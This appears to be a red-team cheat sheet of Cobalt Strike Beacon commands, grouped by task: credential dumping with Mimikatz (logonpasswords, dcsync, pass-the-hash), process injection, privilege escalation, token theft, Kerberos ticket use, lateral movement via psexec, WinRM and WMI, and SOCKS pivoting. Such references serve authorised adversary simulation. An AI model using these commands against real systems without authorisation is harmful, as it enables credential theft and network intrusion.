Cobalt Strike#

Cobalt Strike is software for adversary simulations and red-team operations. The operator drives Beacons over C2, pivots through compromised hosts, and stages credential and lateral movement tradecraft from a single console.

Basic#

cancel [*file*]                    # cancel a download in progress (wildcards)
cd [directory]                     # change working directory
clear                              # clear current taskings
cp [src] [dest]                    # file copy
download [C:\filePath]             # download a file from the Beacon host
downloads                          # list downloads in progress
execute-assembly                   # run a local .NET exe as a post-ex job
exit                               # task the Beacon to exit
help <cmd>                         # available commands or help for one
inject [pid] <x86|x64>             # inject a new Beacon into a process
jobkill [job ID]                   # kill a job
jobs                               # list running jobs
keylogger [pid] <x86|x64>          # inject a keylogger into a pid / arch
link / unlink [IP address]         # link or unlink to a remote Beacon
ls <C:\Path>                       # list files at path or current folder
net [session|share|localgroup|...] # Beacon-native net commands (no net.exe)
ps                                 # process listing
pwd                                # working directory of the Beacon
reg_query [x86|x64] [HIVE\path\to\key]                   # query registry key
reg_query [x86|x64] [HIVE\path\to\key] [value]           # query registry value
rm [file|folder]                   # delete a file or folder
screenshot [pid] <x86|x64> [runtime in seconds]
setenv                             # set an environment variable
shell [cmd] [arguments]            # exec via cmd.exe
sleep [seconds] <jitter/0-99>      # set Beacon sleep and jitter (0 = interactive)
upload [/path/to/file]             # upload from attacker to Beacon CWD

Spoofing#

argue [command] [fake arguments]                # add a command to the fake list
ppid <ID>                                       # set the parent process ID
spawnto <x86|x64> <C:\process\to\spawn.exe>     # set the child process spawned

Mimikatz#

mimikatz [module::command] <args>     # !module:: elevate to SYSTEM; @module:: force current token
logonpasswords                        # sekurlsa::logonpasswords (hashes + plaintext from LSASS)
dcsync [DOMAIN.fqdn] [DOMAIN\user]    # lsadump::dcsync for a user's hash from a DC
pth [DOMAIN\user] [NTLM hash]         # sekurlsa::pth, inject into LSASS (needs local admin)

Desktop VNC#

desktop <pid> <x86|x64> <low|high>    # stage VNC, tunnel through Beacon

PowerShell#

powershell-import [/path/to/script.ps1]                # import a .ps1, cached in Beacon
powershell [commandlet] [arguments]                    # local TCP loader, return output
powerpick [commandlet] [arguments]                     # @tifkin_ Unmanaged PowerShell
psinject [pid] [arch] [commandlet] [arguments]         # inject UMPS into a process

Session passing#

dllinject [pid]                                       # reflective DLL into a process
inject [pid] <x86|x64>                                # new Beacon into a process
shinject [pid] <x86|x64> [/path/to/file.bin]          # shellcode injection from file
spawn <x86|x64> [listener]                            # spawn a Beacon to listener
spawnas [DOMAIN\user] [password] [listener]           # spawn as another user
dllload [pid] [c:\path\to\file.dll]                   # load an on-disk DLL

Privilege escalation#

elevate                                               # list registered exploits
elevate [exploit] [listener]                          # attempt elevation
runasadmin                                            # list elevators
runasadmin [exploit] [command + args]                 # run command elevated
runas [DOMAIN\user] [password] [command]              # run as another user
spawnas [DOMAIN\user] [password] [listener]           # session as another user
getsystem                                             # impersonate SYSTEM token
elevate svc-exe [listener]                            # service-based SYSTEM
getprivs                                              # enable assigned privileges

Recon#

portscan [targets] [ports]                            # start port scan job
portscan [targets] arp                                # ARP-based liveness
portscan [targets] icmp                               # ICMP-based liveness
net dclist                                            # find domain controller
net view                                              # find targets on the domain
net computers                                         # query computer accounts on DC
net localgroup \\TARGET                               # groups on remote system
net localgroup \\TARGET group name                    # members of a group remotely

Tokens#

steal_token [process id]                              # impersonate from existing process
make_token [DOMAIN\user] [password]                   # token that passes these creds
getuid                                                # print current token
rev2self                                              # revert to original token

Tickets#

kerberos_ticket_use [/path/to/ticket.kirbi]           # inject a Kerberos ticket
kerberos_ticket_purge                                 # purge tickets from session

Lateral movement#

jump                                                  # list lateral movement modules
jump [module] [target] [listener]                     # attempt payload on remote
jump psexec [target] [listener]                       # service-based EXE artifact
jump psexec64 [target] [listener]                     # 64-bit service-based EXE
jump psexec_psh [target] [listener]                   # PowerShell one-liner
jump winrm [target] [listener]                        # PowerShell via WinRM
jump winrm64 [target] [listener]
remote-exec                                           # list remote exec modules
remote-exec [module] [target] [command + args]
remote-exec psexec [target] [command + args]         # via Service Control Manager
remote-exec winrm [target] [command + args]          # WinRM (PowerShell)
remote-exec wmi [target] [command + args]            # WMI (PowerShell)

Pivoting#

socks [PORT]                                          # SOCKS through Beacon
socks stop                                            # disable SOCKS proxy
browserpivot <pid> <x86|x64>                          # proxy browser through IE process
rportfwd [bind port] [forward host] [forward port]    # reverse port forward
rportfwd stop [bind port]                             # stop the reverse forward

SSH sessions#

ssh [target] [user] [password]                        # SSH session from Beacon on Unix
ssh-key [target] [user] [/path/to/key.pem]            # SSH session with key
shell [cmd + arguments]                               # run command on SSH
sudo [password] [cmd + arguments]                     # attempt sudo

Integrations#

The Elevate Kit is an Aggressor Script that integrates open-source privilege escalation exploits into Cobalt Strike.

References#